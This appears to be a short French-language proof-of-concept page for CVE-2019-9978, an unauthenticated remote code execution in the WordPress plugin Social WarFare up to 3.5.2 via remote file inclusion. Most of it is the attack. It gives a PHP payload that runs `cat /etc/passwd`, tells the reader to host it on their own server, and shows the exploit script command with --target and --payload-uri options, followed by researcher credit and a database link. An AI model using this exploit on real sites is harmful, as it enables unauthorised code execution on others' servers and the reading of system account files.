
CVE-2019-9978 - (PoC) RCE dans le plugin Social WarFare (<=3.5.2)
CVE-2019-9978 - (PoC) RCE dans le plugin Social WarFare (<=3.5.2)
Une exécution de code à distance non authentifiée a été découverte dans la fonctionnalité qui gère l'importation des paramètres. Un utilisateur peut exploiter l'utilisation de RFI pour réaliser une RCE.
Copiez la payload suivante :
<pre>system('cat /etc/passwd')</pre>
Enregistrez-la avec le nom de fichier : payload.txt et téléchargez-la sur un serveur. L'URI devrait ressembler à : http(s)://yoursite.com/payload.txt. Enfin, fournissez vos options --target et --payload-uri :
$ python cve-2019-9978.py --target http://vulntarget.com \
--payload-uri http://yourpayloadsite.com/payload.txt

Chercheur : Luka Sikic
Lien : https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
Auteur : @hash3liZer